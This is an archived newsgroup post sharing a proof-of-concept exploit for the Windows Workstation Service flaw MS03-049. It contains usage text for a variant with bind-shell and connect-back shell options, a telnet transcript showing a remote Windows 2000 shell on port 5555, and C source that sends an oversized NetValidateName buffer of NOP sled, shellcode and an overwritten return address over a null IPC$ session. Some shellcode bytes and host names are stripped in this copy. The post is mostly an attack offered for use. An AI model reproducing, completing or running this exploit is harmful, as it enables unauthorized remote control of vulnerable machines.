From: elvi52001 at (- ElviS -)
Subject: Windows Workstation Service Exploit MS03-049 - New?

A better version of the code was made by snooq, with good options :-)

 printf("Usage: %s [options]\n",s);
 printf("\t-r\tSize of 'return addresses'\n");
 printf("\t-a\tAlignment size [0~3]\n");
 printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
 printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
 printf("\t-s\tShellcode offset from the return address\n");
 printf("\t-h\tTarget's IP\n");
 printf("\t-t\tTarget types. ( -H for more info )\n");
 printf("\t-H\tShow list of possible targets\n");
 printf("\t-l\tListening for shell connecting\n");
 printf("\t\tback to port specified by '-p' switch\n");
 printf("\t-i\tIP for shell to connect back\n");
 printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
 printf("\t-T\tTime out (in number of seconds)\n\n");
 printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");

"Hanabishi Recca" <> wrote: 

C:\telnet 5555

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.



Proof of concept for MS03-049.
This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
to work *only* with that (it will probably crash the other 2Ks, no clue
about XPs).

To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
this public version, do not bother to ask.

Credits go to eEye :)
See original bulletin for more information, it is very well documented.



#include <windows.h>
#include <winnetwk.h>   // WNetAddConnection2 / WNetCancelConnection2 (link mpr.lib)
#include <stdio.h>
#include <string.h>

#define SIZE 2048

/* The typedef for MYPROC (pointer to the NetValidateName export) did not
   survive the archived copy of this post. */

// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h
/* ... remaining shellcode bytes not preserved in the archived copy ... */
;

unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload

int main(void)
{
    int ret;
    HINSTANCE hInstance;
    MYPROC procAddress;
    char szBuffer[SIZE];
    NETRESOURCE netResource;

    netResource.lpLocalName = NULL;
    netResource.lpProvider = NULL;
    netResource.dwType = RESOURCETYPE_ANY;
    netResource.lpRemoteName = "\\\\\\ipc$"; // target host name stripped in the archived copy

    ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
    if (ret != 0) {
        fprintf(stderr, "[-] WNetAddConnection2 failed\n");
        return 1;
    }

    hInstance = LoadLibrary("netapi32");
    if (hInstance == NULL) {
        fprintf(stderr, "[-] LoadLibrary failed\n");
        return 1;
    }

    procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
    if (procAddress == NULL) {
        fprintf(stderr, "[-] GetProcAddress failed\n");
        return 1;
    }

    memset(szBuffer, 0x90, sizeof(szBuffer));
    memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
    // ebp @ &szBuffer[2013]
    *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, use opcode search engine for more, but
                                                     // be aware that a call esp will change the offset in the stack)
    memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
    ret = (procAddress)(L"\\\\", szBuffer, NULL, NULL, 0); // target host name stripped in the archived copy

    WNetCancelConnection2("\\\\\\ipc$", 0, TRUE);

    return 0;
}
